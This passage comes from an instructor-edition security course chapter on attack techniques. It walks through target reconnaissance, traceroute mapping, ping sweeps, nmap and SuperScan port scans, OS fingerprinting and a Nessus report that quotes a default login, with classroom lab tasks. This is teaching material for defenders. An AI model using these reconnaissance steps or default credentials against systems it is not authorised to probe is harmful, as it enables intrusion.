Given a network scenario, you will define how a virus, worm, or TrojanHorse represents a threat and how they are differentiated from oneanother.

8F Implement a malicious Web site.

In this topic, you will see how ordinary users can be tricked into down-loading or running programs on their computers via the Web.

8G Gain control over a network system.

Given a simple network scenario, you will gain control over a system byusing Netcat.

Data FilesMalweb folder and con-tents

Lesson Time6 hours

LESSON

8

Lesson 8: Attack Techniques 481

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 535: SCNP Hardening

8H Record keystrokes with software and hardware.

Given a simple network scenario, you will use software and hardwarerecording tools to log the keystrokes entered on a keyboard.

8I Crack encrypted passwords on Linux and Microsoft machines.

Given a simple network scenario, you will use tools to crack encryptedpasswords on Linux and Windows computers.

8J Reveal passwords hidden by asterisks.

Given a simple network scenario, you will use password-revealing toolsto identify hidden passwords.

8K Explore and discuss social engineering techniques.

Given a simple network scenario, you will explore and discuss socialengineering techniques used to gather information about and access to atarget network.

8L Analyze an example of social engineering.

Given a scenario of social engineering, you will identify the methodsused and information gained by an attacker.

8M Investigate potential ways that unauthorized administrator access canbe achieved.

You will see how basic programming skills can be used to give a useraccount administrative privileges on a Windows 2000 network; howphysical access to the server, along with another OS and a little advancedknowledge of how Windows works, can be used to compromise anunpatched Windows NT Server; and how a Linux machine can be com-promised by booting to single-user mode.

8N Hide the evidence from an attack.

Given a simple network scenario, you will determine ways to hide theevidence of an attack, such as by clearing log files in both Windows andLinux operating systems.

8O Perform a Denial of Service on a target host.

Given a simple network scenario, you will use Denial of Service tools totake a target computer offline.

482 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 536: SCNP Hardening

Topic 8ANetwork ReconnaissanceOne of the first things to realize is that hacking (cracking, phreaking, and soforth, will all be referred to as hacking in this lesson) is generally a tediousprocess. It is, in reality, quite unlike the movie visualizations of hacking. It isn’tsimply typing in a string of a few numbers and magically gaining access to anetwork.

For example, what network is the hacker even trying to get into? How did theychoose this network? This is where the work can come in. For many hackers, theactual act of network penetration is not the difficult task. It is the task of findinga network to target in the first place.

Finding a TargetFinding the target network is a process that requires extremes, such as from hav-ing a very clever and creative mind to simply driving down the street. If thehacker is simply hacking for fun, any business that looks interesting is a goodtarget. If the hacker is trying to challenge himself, then a bit more work isrequired than a simple drive-by, looking for the neatest looking building.

There are tools available to the potential hacker, although the best tool is thebrain. Being able to read the newspapers, hardcopy or online, is how many hack-ers find their targets. But what are they looking for, or what are they trying tofind?

These are some of the questions hackers must answer before they go to work:

• Who/What am I going to hack?

• Why am I going to hack?

• What am I looking for if access is gained?

Without knowing the answers to these questions ahead of time, the hacker isdoomed to failure.

Assuming that the basic questions are answered, the hacker begins thereconnaissance. One of the primary areas to go for potential targets is to anewsgroup. New network administrators will practically give away their networkcontents in a newsgroup to someone who seems helpful.

For many hackers, newsgroup browsing is like fishing. Perhaps you need to wadethrough hundreds of messages, but if you wait long enough, you will get a bite.Be wary of posting too much information or real IP addresses in a newsgroup,even if it is a strongly moderated group.

If there is no useful data in the newsgroups on a given day, another valuableresource for the hacker is to search the SEC (Securities and ExchangeCommission). The SEC has records on all recent business mergers andacquisitions. Searching through the press releases of various business mergers andmodifications may be all that a hacker needs to identify a potential target.

phreaking:The art and science ofcracking the phone network.

penetration:The successful unauthorizedaccess to an automatedsystem.

Network Reconnaissance

Common newsgroups thathackers may browse are anygroups related toadministration, security, andprotocols.

Lesson 8: Attack Techniques 483

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 537: SCNP Hardening

Figure 8-1: The SEC Web site.

The usefulness of this information is varied. But in many situations, when a largecompany takes over or buys out a smaller company, one of the first issues is con-nectivity between companies. Much of the time, security is loosened a bit toensure that all employees in every location can communicate.

It is during this loose period that the hacker may sneak in an open hole in thenetwork. The hacker will attack the smaller company in hopes that the security islowered, which it usually is, compared to the bigger company. By finding a weakpoint in the smaller company and exploiting it before the merger is complete, thehacker can gain a back door entry into the larger company.

If a potential company has been found via an SEC search or by other means, thenext step is to find out more information about the company. The SEC filing isusually quite comprehensive as far as the amount of data it reveals; however,there are other places to go to gain further knowledge.

Who is the Target?The next place to go to learn about a company is their Web site registrationinformation. This information is easily available, and in some instances containsincredible amounts of data about the company. Common registration searches arelocated at the following Web sites:

• General searches: www.internic.com/alpha.html.

• The U.S. military directories: http://whois.nic.mil.

• The U.S. government directories:http://whois.nic.gov.

back door:A hole in the security of a

computer system deliberatelyleft in place by designers or

maintainers. Synonymouswith trap door; a hidden

software or hardwaremechanism used to

circumvent security controls.

484 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 538: SCNP Hardening

Figure 8-2: An example of a search lookup tool.

A search through one of these directories can reveal information such as thephysical address of the company, the name of the person who owns the DNSdomain name, the name of the network administrator, the company phone num-ber, the company fax number, the email addresses of administrators, the DNSservers that the company (or at least the Web site) uses, the ISP that the companyuses, other domain names the company owns, the IP address range assigned tothe target company, and more. See Figure 8-3 for an example of a Whois output.

Lesson 8: Attack Techniques 485

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 539: SCNP Hardening

Figure 8-3: The output results from running a Whois lookup on the Web siteNetworkSolutions.com, one of the most popular registration sites on the Internet.

Information learned from the Whois lookup includes:

• Registrar: This defines whom the actual person or company is that owns thedomain name.

• Mailing Addresses: This defines the mailing and/or the physical address ofthe business or person who owns the name.

• Contact Names: This defines the person(s) responsible for billing and/oradministrative functions of the domain name. At times, this will also list theactual email addresses and phone numbers of the contact names.

• Record Updates: This defines the last time the record was updated, and whenit expires.

• Network Addresses: This defines the IP addresses associated with the domainname.

• DNS Server Addresses: This defines the DNS servers responsible for thedomain name.

Studying the Message SourceA follow up would be to send an email to a made-up address, something that willbe returned as an unknown recipient. Then, the message source can be studied, tolearn the details about the email servers used in the target network. See Figure8-4 for an example of reading the message source of an email message.

486 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 540: SCNP Hardening

Figure 8-4: An example of the message source of an email message.

In Figure 8-4, you can see that a hacker can learn the names of the email serversinside the potential target network—in this case: mailserver.securitycertified.net.The hacker learns that the private IP address being used is 192.168.23.45. Thismay indicate the address range used inside the company. Other message sourcescan reveal public IP addresses, as well as the names (and even the namingschemes) of the company’s routers. All of this information can be learned via asimple returned email message.

So, in a matter of minutes, a hacker using registration searches and a bogus emailcan learn quite a bit of information about the potential target. Try this for yourown company this coming weekend, and see what you can learn. You may beable to learn details you did not know, even though you work there!

One of the above items that needs to be addressed is the other domain names acompany might own. Often, the smaller satellite sites have looser security imple-mentations, and may be the starting point for an attack. If the company ownsmany sites and they are all active, they all need to be secured, not just the pri-mary one.

After this initial network reconnaissance has been completed and a potential tar-get network has been identified, the hacker must next learn all of the detailspossible about this target network.

Lesson 8: Attack Techniques 487

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 541: SCNP Hardening

Topic 8BMapping the NetworkWith the potential target network identified, the next phase a hacker needs tocomplete is to map the network. What this means is to identify the topology ofthe network and to identify as many of the nodes possible by their IP addressesand their position in the network.

There are many tools available to the network security professional to managetheir networks. Some of these tools are free, while others have costs associatedwith them. The very same tools that are used by the administrators and securityprofessionals are used by hackers in trying to map out potential target networks.

Using TracerouteThe standard free tool that most hackers have to use for network mapping is thetraceroute utility. Traceroute is included in most versions of UNIX, Linux, Win-dows NT, and Windows 2000. Traceroute is a simple and highly effective tool fordefining the path that packets are taking across the network from node to node.Written to use the Time To Live field (TTL) of an IP packet, traceroute createsICMP TIME-EXCEEDED messages from each node. For each router (or node)the packet passes through, the TTL is lowered by one. This has the net effect ofallowing the TTL field in the packet to become the hop count.

Using Traceroute allows for identification of the routers on a given network andprovides information as to their filtering properties. It is not uncommon forfirewalls to block traceroute from passing through. Knowing this information, ahacker is able to make an educated guess as to which IP addresses are firewallsand which are routers.

The UNIX (and Linux) implementations of traceroute use UDP (User DatagramPackets) packets as the default, but they do have the option to use ICMP (InternetControl Messaging Protocol) packets via the -I switch. Windows NT (and 2000)use ICMP echo request packets by default.

Using tracert on WindowsThe following is an example of a trace completed on a Windows 2000 computer:

C:>tracert 10.0.10.100Tracing route to 10.0.10.100 over a maximum of 30 hops:1 <10ms <10ms <10ms 192.168.15.12 70ms 81ms 71ms isp1.net [172.16.31.1]3 54ms 37ms 48ms isp2.net [169.254.48.100]4 61ms 73ms 65ms isp3.net [10.0.10.57]5 27ms 29ms 25ms 10.0.10.100

Mapping the Network

network security:Protection of networks and

their services fromunauthorized modification,destruction, or disclosure,

and provision of assurancethat the network performs its

critical functions correctlyand there are no harmful

side effects. Network securityincludes providing for data

integrity.

Mapping Tools

The traceroute program isspelled “tracert” in Windowsoperating systems to followthe 8.3 naming convention.

488 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 542: SCNP Hardening

TASK 8B-1Using Windows Tracing Tools

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account.

1. Open a command prompt, and enter tracert 172.17.10.1 to trace the routeto the specified IP address.

2. View the results, paying particular attention to:

• Time between hops

• Addresses resolved

• Overall number of hops

3. Close the Command Prompt.

Using traceroute on LinuxLinux also has tracing tools included. The executable is named traceroute onLinux operating systems. The following is an example of Linux tracing:

[lnx1]$ traceroute 10.0.10.100traceroute (10.0.10.100), 30 hops max, 40 byte packets1 dg1 (192.168.15.1) 7.933ms 8.719ms 8.211ms2 isp1 (172.16.31.1) 68.762ms 79.204ms 72.659ms3 isp2 (169.254.48.100) 56.843ms 37.026ms 47.242ms4 isp3 (10.0.10.57) 61.845ms 73.407ms 64.921ms5 10.0.10.100(10.0.10.100) 27.721ms 29.285ms 26.387ms

Using Graphical Tracing ToolsIn addition to the tools that ship with both Windows and Linux operating sys-tems, there are many commercially available tools for tracing. Two of these toolscan be tried as downloadable evaluation copies and purchased later if desired:

• VisualRoute, found at www.visualroute.com.

• NeoTrace, found at www.neotrace.com.

Each of these tools provides for graphical mapping of the data path and muchmore. In addition to providing an actual image of the route, these tools can per-form functions such as Whois lookups, the physical location of each hop, timebetween hops, and more.

Lesson 8: Attack Techniques 489

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 543: SCNP Hardening

Figure 8-5: An example of using Visual Route.

Another tool, in the same category as VisualRoute, is NeoTrace. In a slightly dif-ferent visual format, these two tools are designed to show the network on-screenduring the trace.

A useful, or at least interesting, option available when you are using NeoTrace, ifyou have an Internet connection, is to show either a map or a satellite image ofthe location you are tracing to (or any of the nodes in between).

490 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 544: SCNP Hardening

Figure 8-6: An example of using NeoTrace.

TASK 8B-2Using VisualRoute

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account.

1. Copy the VisualRoute installation program from the location providedby your instructor to your desktop. Double-click the installation pro-gram, and follow the prompts to install VisualRoute in the defaultlocation.

2. Start the VisualRoute program. It should be found in the Start menu,under Programs. Select English as the language, if necessary.

3. In the Enter Host/URL text box, enter the IP address of another computerin your class, such as 172.17.10.1.

4. Select the link and view the results, paying particular attention to thefollowing:

• Time between hops

• Addresses resolved

• Overall number of hops

5. Close VisualRoute and any other open windows.

Provide students with thelocation of the VisualRouteinstallation files.

Lesson 8: Attack Techniques 491

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 545: SCNP Hardening

Topic 8CSweeping the NetworkOnce the basic mapping of the target network has been completed with the giventools such as NeoTrace Pro, Visual Route, and traceroute, the hacker will need toget more details about the target nodes that are in the network. This is where net-work scanning comes into play. By using a network scanner of a given type, thehacker can start to identify the potential target machines inside the network. Thepotential target has been identified, now it is time to start to look for a potentialentry point.

The different options for learning about a network include:

• Network ping sweeps

• ICMP queries

• Automated discovery tools

• Operating system detection

Ping SweepingNetwork ping sweeps are used to determine which of the remote hosts on a givensegment are active. The concept is somewhat simple, yet effective:

1. Ping a given range of hosts.

2. The hosts that respond are determined to be the ones that are active.

3. The hosts that do not respond are assumed not active.

4. By looking at the list of responding hosts, the hacker can determine what theactive range of IP address is.

The ping sweep method is effective, but it is worth noting that an administratorcan have hosts configured to not respond to different types of ping, as you willsee later. If the ping sweep is not producing the results the hacker is looking for,he or she will simply modify the properties of the sweep to try different attempts.

The default operation of ping is to issue an ICMP ECHO packet request to theremote host. The remote host would then return an ICMP ECHO_REPLY packet,which indicates nothing more than the remote node is on and responding.

There are ping sweep utilities made, so the hacker does not have to enter eachpossible address manually. Take care when defining the IP addresses for a pingsweep. If the broadcast address for a segment is included in the sweep, a denialof service may result. Also, try not to perform such scanning while on theInternet; someone may complain, and your ISP may cut you off.

Linux Ping Sweeping with the fping/gping ToolThe common ping sweep for UNIX/Linux is called fping/gping. Gping generatesthe list of potential addresses and submits that information to fping. Fping thenperforms the ping function and sends the output to a text-readable file that identi-fies active hosts.

Sweeping the Network

Ping Sweeping

492 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 546: SCNP Hardening

A major benefit in the operation of fping/gping is the speed at which the com-mands complete. In a traditional sense, using ping means send one packet to theremote host, wait for the response, and then proceed to the next host. As you cansee, following this method will take quite some time if there are hundreds orthousands of nodes to ping. Fping/gping is able to speed up this process by sub-mitting a mass request out to the network in parallel. This rather simple approachis quite effective, as shown here:

[Server] $ gping 192 168 1 1 254 | fping -a192.168.1.207 is alive192.168.1.7 is alive192.168.1.48 is alive192.168.4.52 is alive...

Linux Ping Sweeping with the nmap ToolOne of the most used and most respected network tools is nmap. Written by anindividual named Fyodor, this is one tool that all security professionals are com-fortable with. In this section, we will investigate only one area of nmap, but thisis one tool you will see several times. The following example of nmap is beingused to locate active hosts:

[Server] $ nmap -sP 192.168.1.0/254Starting nmap V . 2.53 by [email protected](www.insecure.org/nmap/)Host (192.168.1.1) appears to be up.Host (192.168.1.7) appears to be up.Host (192.168.1.48) appears to be up.Host (192.168.4.52) appears to be up....

Windows Ping SweepersWindows users are not left behind when it comes to ping sweep utilities. Thesefunction via a command prompt or a GUI and present the results in the respond-ing window. They work on the same premise, by filling a starting and endingaddress, then telling the program to sweep. Examples of common Windows pingsweepers are Pinger, SuperScan, and Ping Sweep. (Ping Sweep is part of a pro-fessional set of networking tools from SolarWinds Solarwinds.net.)

PingerPinger is a fast, efficient, and lightweight Windows tool for network ping sweeps.After you define the starting and ending IP addresses, followed by options suchas number of passes and name resolution, Pinger is able to complete its taskquickly.

Lesson 8: Attack Techniques 493

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 547: SCNP Hardening

Figure 8-7: An example of Pinger before IP addresses are defined.

SuperScanSuperScan is another tool like nmap that has many more functions than simplyidentifying active hosts. We will return to SuperScan later in the course, but fornow will focus on the active host identification option. See Figure 8-8 for theSuperScan default window.

494 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 548: SCNP Hardening

Figure 8-8: SuperScan in default mode, before a scan begins.

TASK 8C-1Using SuperScan

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account.

1. Copy the SuperScan installation program from the location provided byyour instructor to the desktop. Then double-click it and follow theprompts to install SuperScan in the default location. The program auto-matically starts when the installation is complete.

2. In the IP Start and Stop text boxes at the left of the screen, enter the start-ing IP address of your portion of the class network and the ending IPaddress of the network. For instance, if you are on the LEFT side of theroom, you might enter 172.16.0.1 through 172.16.10.6

3. Under Scan Type, select Ping Only.

4. Verify that Resolve Hostnames is checked.

5. Verify that Show Host Responses is checked, even though it is grayed out.

6. Click Start to begin the scan. Because SuperScan pings every possibleaddress, the scan takes a while to complete.

7. Observe the responses from the other hosts in the room as they are dis-played in the GUI.

Provide students with thelocation of the SuperScaninstallation file.

Lesson 8: Attack Techniques 495

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 549: SCNP Hardening

8. If possible, try to observe the activity on the hubs or switches in theclass during this activity.

9. Close SuperScan.

Topic 8DScanning the NetworkNow that you’ve identified potential target hosts to hack, you need to find outhow to get into these targets. One way to do this is to identify open ports on thetarget hosts.

Port ScanningPort scanning is also the primary method used to identify potential targets in theevent that an administrator has disabled ICMP at the firewall. Even if a host doesnot respond to a ping request, that node may be active, and the port scan canidentify this host in hiding.

Port scanners have several different methods of operation. Based on the inputtype, the scanners may use these different methods to avoid detection. A few ofthe options they can run as are:

• TCP connect scan. The TCP connect scan makes a full three-way-handshakelevel connection to the remote host. Since a full connection is created, thistype of scan is easy to detect.

• TCP SYN scan. The TCP SYN scan makes only a half-open connection.This scan steps part of the way through the three-way handshake, only longenough to receive the request to SYN. Once the request is made, the scannercan assume this port is open and not respond with the full connection. TheTCP SYN scan is harder to detect than the full connect scan.

• TCP ACK scan. The TCP ACK scan works on a similar premise as the SYNscan in that it does not establish a full connection with the target host. TheACK scan can tell the hacker if the firewall is only accepting full connec-tions, or if it is performing more detailed controlled filtering.

Three other scan types are based on the principles of RFC 793, which states howthe target system should respond with RST messages:

• TCP FIN scan. The TCP FIN scan sends a FIN packet to the given port, andthe remote node will respond with a RST for closed ports. This scan worksbest on UNIX TCP/IP stack implementations.

• TCP Null scan. The TCP Null scan sets all flags to off, and the remote noderesponds with a RST message for all closed ports.

• TCP Xmas Tree scan. The TCP Xmas Tree scan sends a PUSH, FIN, andURG packet to the target port, which the remote node will respond with aRST for all closed ports.

Scanning the Network

Port scanning an entirenetwork segment can

consume high amounts ofbandwidth and can be very

time consuming.

Most Intrusion DetectionSystems will detect port

scans while they arescanning.

496 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 550: SCNP Hardening

The netstat ToolAlthough there are many tools for scanning, it is important to not forget thebuilt-in utilities offered in operating systems. One example is netstat in Windows.Figure 8-9 shows the possible switches that can be used with netstat. Netstat is apowerful tool, but has a limitation in that it does not identify the open program orservice that is listening on a port, only that the port is open.

Figure 8-9: Netstat switch options.

Pay close attention to a few of the more often used switches, such as:

• -a, which shows all connections and listening ports.

• -e, which displays statistics such as Unicast packets sent and received.

• -s, which defines statistics on a per-protocol basis.

Service IdentificationAlthough learning which nodes on the target network are active is important, andusing network scanning and sweeping will divulge this information, the hacker isconcerned with learning even finer levels of detail.

The hacker wants to know what services are running on the potential targets.Knowing the number of services that are active, and what they are designed todo, will make the hacker’s entry attempts much more likely to succeed.

The tools you used in the previous topics will be used to their next level here.Most of the same tools we have already looked at, such as nmap and SuperScan,can also be used to define the active ports.

Two other well-known port scanners are Strobe and Netcat. Strobe is an efficientport scanner that is limited to scanning TCP ports, so if UDP ports are the target,a different tool must be selected. Additionally, Strobe uses the TCP full connectmethod, meaning that Intrusion Detection Systems will pick it up quickly. SeeFigure 8-10 for an example of Strobe in operation.

Scanning Tools

Lesson 8: Attack Techniques 497

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 551: SCNP Hardening

Figure 8-10: Strobe’s available options.

A utility we have seen before—nmap—also has great port-scanning and service-definition options. It has the built-in ability to scan both TCP and UDP ports, asseen in Figure 8-11. There are too many nmap switches to list here, so once it isrunning, you will want to be sure and check the associated help file. A few of thesignificant switches are:

• -sT: TCP connect () port scan (default)

• -sS: TCP SYN stealth port scan (best all-around TCP scan)

• -sU: UDP port scan

• -sP: ping scan (find any reachable machine)

• -sF, -sX, -SN Stealth Fin, Xmas, or Null scan (experts only)

Figure 8-11: Using nmap to port-scan a network host.

498 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 552: SCNP Hardening

TASK 8D-1Using nmap

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account.

1. Log in to Linux as root.

2. Open a Terminal Window.

3. Enter nmap -sS x.x.x.x, where x.x.x.x is any IP address in the classroomnetwork.

4. View the results, noting the open ports and their associated services.

5. Close all open windows.

Windows Port ScannersAlthough we have just used Linux tools for the last exercise, Windows users arenot without port scanning tools. From professional tools such as NetScan ToolsPro 2001, to free programs like the SuperScan and WinScan, as well as Nmapnt(a version of nmap for NT), the whole spectrum of network scanning is covered.

NetScan Tools Pro 2001 is one of the most comprehensive administrative toolsfor understanding a network. Available options include ping sweeps, port scan-ning, traceroute, whois lookups, and more. See Figure 8-12 for an example of theoptions in NetScan Tools Pro.

Figure 8-12: The options available in NetScan Tools Pro 2001.

Lesson 8: Attack Techniques 499

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 553: SCNP Hardening

SuperScan, which was used in earlier exercises, also has more options thansimple ping sweeping. With SuperScan, the options are presented to port-scan bya given range of numbers, all port numbers, or specific lists. It is the specific-listfeature that comes in handy. There are predesigned port lists for scanning, andlists can be customized. Figure 8-13 and Figure 8-14 show SuperScan in use.

Figure 8-13: An example of SuperScan during a scan. Nodes with plus signs next to theirIP addresses have open ports.

Figure 8-14 shows SuperScan after the scan is complete.

500 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 554: SCNP Hardening

Figure 8-14: An example of SuperScan after a scan has been completed. Notice the nodethat has been expanded to reveal the open ports.

TASK 8D-2Using SuperScan

Setup: You are logged in to Linux as root.

1. Log on to Windows 2000 as the renamed Administrator account.

2. Start the Super Scan program.

3. In the IP Start and Stop text boxes, enter the starting and ending IPaddresses of your portion of the classroom network.

4. Under Scan Type, select All Ports From.

5. Set Port Values from 1 to 1024.

6. Leave Show Host Responses checked.

7. Start the scan.

8. Observe the responses from the other hosts in the room as they are dis-played in the GUI. If possible, try also to observe the activity on the hubsor switches in the class during this activity.

Lesson 8: Attack Techniques 501

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 555: SCNP Hardening

9. When the scan is complete, click the Expand All button in the lower-rightarea of the screen, to see what ports are open on the other computers in theclassroom.

10. Compare these results with the ones you saw from using nmap. If youneed a reminder for the nmap results, see Figure 8-11.

11. Close SuperScan.

Identifying the Operating System and OS VersionOnce the hacker has an idea of the available targets, he or she next needs to tryto identify what operating system is running and, if possible, the version of theoperating system. By learning all of the possible details of a potential target, thehacker knows his or her chances of a successful connection increase drastically.There are several ways a hacker can try to identify the operating systems runningon a network. He or she can try banner grabbing, active stack fingerprinting, andpassive stack fingerprinting.

Banner grabbing is the oldest and most simple technique for identifying the oper-ating system. A potential hacker tries to telnet to a given target host. That targetmay prompt for a user name and password. Many times, in the banner messagefor the telnet session, the system administrator has left clues to, or even haslabeled, the identity of the device the hacker is connecting to. For example, Fig-ure 8-15 shows the banner screen for a telnet session.

Figure 8-15: An example of a banner posted as a warning on a router.

A warning message is needed, and required by most security policies; however,giving out too much information is not needed or desirable. There is no need tomake a hacker’s job easier. Banner grabbing is one of the simplest methods oflearning information.

502 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 556: SCNP Hardening

Banner grabbing, in general, is no longer a method that hackers can rely on withany degree of certainty. Most administrators are aware of banner grabbing and nolonger have clues to the OS listed in cleartext that anyone can see. In fact, aclever administrator will put in banners from other OSs just to confuse awould-be banner grabber. These are all superficial issues however, as there arestill other instances of too much information easily available, so administratorsshould double-check their systems.

In addition to banner grabbing from a telnet session, another common techniquethat hackers can use is to identify the operating system by reading the sourcecode of Web sites. Some Webmasters put relevant information in the commentfields of their Web sites. This information can include what was used to createthe Web site, such as Microsoft FrontPage. If FrontPage created the Web site, thehacker can be relatively sure that the site is hosted on a Microsoft box, mostlikely Windows NT. Figure 8-16 shows an example of a Web source.

Figure 8-16: Viewing the source code of a Web site.

Stack IdentificationOnce the hacker has checked to see if banner grabbing offers any further details,and finds out that there are none, he or she might move to stack identification.Stack identification is the process of examining the TCP/IP protocol stack that isrunning.

Although TCP/IP is an industry standard, most vendors have slightly differentimplementations of TCP running on their systems. By being aware of this, ahacker can look at the way TCP/IP operates on a potential target, and by analyz-ing this data, make an educated guess at what the OS is.

The specific details of what the hacker will look for vary from person to person,although there are some very common points that most hackers use. The hackerpicks these small variations of TCP/IP by either performing passive or activefingerprinting.

Lesson 8: Attack Techniques 503

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 557: SCNP Hardening

Active stack fingerprinting is when the hacker has a TCP/IP packet from thepotential target and dissects the packet looking for these points. The common fin-gerprint points that hackers look at are the following:

• FIN Probe: The FIN probe takes advantage of the way TCP/IP responds toan open port probe. In many implementations, there will be no responsefrom the probed port. One exception to this is the way Windows NTresponds. Windows NT responds with a FIN/ACK response.

• TCP Initial Window Size: In the TCP/IP lesson, we discussed the concept ofwindowing. Some operating systems use unique values for the initial win-dow size, and this can be used to help identify the operating system.

• Don’t Fragment Bit: Some TCP/IP stacks are set to define whether or not theDon’t Fragment bit is turned on or off.

• ICMP Message Quoting: When an error message is quoted by ICMP, someimplementations send the IP header with an additional 8 bytes. However,Solaris and Linux will send more. ICMP Message Quoting does not requireany listening ports.

Some tools, such as nmap, will try to identify the OS via active stack fingerprint-ing for the hacker. Figure 8-17 shows an example of nmap active stackfingerprinting.

Figure 8-17: An example of nmap performing active stack OS fingerprinting. Notice theRemote Operating System guess.

Figure 8-18 shows another example of nmap active stack fingerprinting.

504 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 558: SCNP Hardening

Figure 8-18: Another example of nmap performing active stack OS fingerprinting. Notice theRemote Operating System guess.

If the hacker does not choose to use active stack fingerprinting, or wishes to bestealthier, he or she can also try passive stack fingerprinting. Passive stack finger-printing uses many of the same checks to determine the type of operating systemin use. The process is slightly different in the fact that the hacker is not initiatinga connection with the potential target. Since there is no established connection,the chances of detection are much lower. However, passive stack fingerprintingrequires access to the medium in order to sniff the packets for identification.

The common methods of passive stack fingerprinting include the Window Sizeand DF (Don’t Fragment) bit, as mentioned above. Another common passivestack fingerprinting option is to check the TTL (Time To Live). Some operatingsystems use a unique value for this setting.

Using nmap to Identify the OSWe will now look at another useful feature of nmap, which, incidentally, standsfor Network MAPper, and is a favored security tool designed for network explo-ration or security auditing. It is available at www.insecure.org. It can performfast scans of entire networks and scans individual hosts just as well. It uses rawIP packets to determine which hosts are active on the target network and whatports they have open and listening. It is also able to try and identify the operatingsystem running by matching TCP/IP signatures. There are both command-line andGUI versions, and a version of nmap for NT is also available fromwww.eEye.com.

security audit:A search through a computersystem for security problemsand vulnerabilities.

Lesson 8: Attack Techniques 505

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 559: SCNP Hardening

TASK 8D-3Using nmap to Identify an Operating System

Setup: You are logged on to Windows 2000 as the renamed Adminis-trator account.

1. Log in to Linux as root.

2. Open a Terminal Window, and enter nmap -sS x.x.x.x -O, where x.x.x.x isthe IP address you want to scan and O is the letter O, not the number zero.

3. View the results, noting the open ports, their associated services, and theOS guess at the bottom of the report.

Using the nmap Front EndAnd as some people don’t seem to like using a command line, we will now seethat there is a GUI version of nmap called Nmap FE.

Figure 8-19: The graphical version of nmap.

506 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 560: SCNP Hardening

TASK 8D-4Using nmap Front End

Setup: You are logged on to Linux as root, and a Terminal Window isopen.

1. In the Terminal Window, enter nmapfe to run the Nmap Front End.

2. Use the GUI to scan another host in the class, finding open ports andidentifying the operating system of the target.

3. Close NmapFE.

Using Nessus to Perform a ScanTo understand the security holes that can be exploited on a system, a full securityscan should be used. Nessus is a tool that provides this option. It can performdifferent types of port scans, and it can report on security holes found in thenetwork.

In this section, screens of Nessus 1.2.7 are shown, even though it is an older ver-sion of the software. Visit www.nessus.org to download the latest stable version.

As of the time of this writing,version 2.0.3 was the mostcurrent stable version of thetool.

Lesson 8: Attack Techniques 507

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 561: SCNP Hardening

Figure 8-20: The available Nmap scan options in Nessus 1.2.7.

Nessus deals with found exploits a bit differently than other security scanners do.It has the ability to actually try and locate buffer overflows or even to crashservers. Once it has located vulnerabilities, a report is generated that shows whatwas found.

The security report will list the following items:

• Security risks by rank (High, Med, Low, and Serious).

• Most dangerous services found on the network.

• Services that are most available on the network.

• Operating systems found on the network.

• Further details of each host scanned.

The section with further details on each host is where the vulnerabilities aredefined. An example of a detailed report is shown here:

508 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 562: SCNP Hardening

Vulnerability found on port www (80/tcp)

The piranha package is installed on the remote host. Thispackage, as it is distributed with Linux RedHat 6.2, comes withthe login/password combination 'piranha/q' (or piranha/piranha)

An attacker may use it to reconfigure your Linux Virtual Servers(LVS).

Solution: upgrade the packages piranha-gui, piranha, andpiranha-docs to version 0.4.13

Risk factor: High CVE: CAN-2000-0248

From this report, you are able to identify the vulnerability and proceed to eitherexploit it (in the case of an attacker) or fix it (in the case of the securityadministrator). Remember, CVE (Common Vulnerabilities and Exposures) identi-fies current threats and gives them a standard name/identifier for future use anddiscussion.

Figure 8-21: An example report after Nessus 1.2.7 has finished scanning.

Lesson 8: Attack Techniques 509

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 563: SCNP Hardening

TASK 8D-5Installing Nessus for First-time Use

Setup: You are logged on to Linux as root, and a Terminal Window isopen.

1. In your /root directory, create a directory named nessus.

2. Copy the Nessus installer script file from the location provided by yourinstructor to the new /root/nessus directory.

3. In the Terminal Window, switch to the /root/nessus directory and entersh nessus-installer.sh to begin the installation.

4. Follow the prompts, and accept the default installation directory of /usr/local.

